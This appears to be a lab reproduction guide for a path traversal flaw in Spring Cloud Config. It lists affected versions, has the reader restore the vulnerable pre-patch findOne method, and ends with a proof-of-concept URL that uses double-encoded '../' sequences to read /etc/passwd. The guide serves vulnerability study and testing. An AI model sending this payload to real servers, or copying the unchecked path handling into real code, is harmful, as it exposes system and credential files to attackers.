About this vulnerability
Affected versions:
Spring Cloud Config 2.1.0 to 2.1.1
Spring Cloud Config 2.0.0 to 2.0.3
Spring Cloud Config 1.4.0 to 1.4.5
Other unsupported older versions (e.g. Spring Cloud Config 1.3 and below)
Details of the fix: https://github.com/spring-cloud/spring-cloud-config/commit/9617f2922ee2ae27f08676716224933f0d869719
Download the git project: https://github.com/spring-cloud/spring-cloud-config
Edit GenericResourceRepository.java and replace the findOne
method with the pre-patch version of the code:
    // Pre-patch findOne, kept as on the page: it is the vulnerable version.
    // The request's resource path is appended with createRelative() without
    // checking for traversal sequences or that the resolved resource still
    // lies under `location`, so an encoded "../" in `path` escapes the repository.
    @Override
    public synchronized Resource findOne(String application, String profile, String label,
            String path) {
        if (StringUtils.hasText(path)) {
            String[] locations = this.service.getLocations(application, profile, label)
                    .getLocations();
            try {
                // search locations in reverse order; first readable match wins
                for (int i = locations.length; i-- > 0;) {
                    String location = locations[i];
                    for (String local : getProfilePaths(profile, path)) {
                        Resource file = this.resourceLoader.getResource(location)
                                .createRelative(local);
                        if (file.exists() && file.isReadable()) {
                            return file;
                        }
                    }
                }
            }
            catch (IOException e) {
                throw new NoSuchResourceException(
                        "Error : " + path + ". (" + e.getMessage() + ")");
            }
        }
        throw new NoSuchResourceException("Not found: " + path);
    }
Run mvn spring-boot:run in the project root directory.
Analysis
https://mp.weixin.qq.com/s/yj0cWEsyiPJr4A7YXpmLJw
Reproduction
PoC:
/test/pathtraversal/master/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd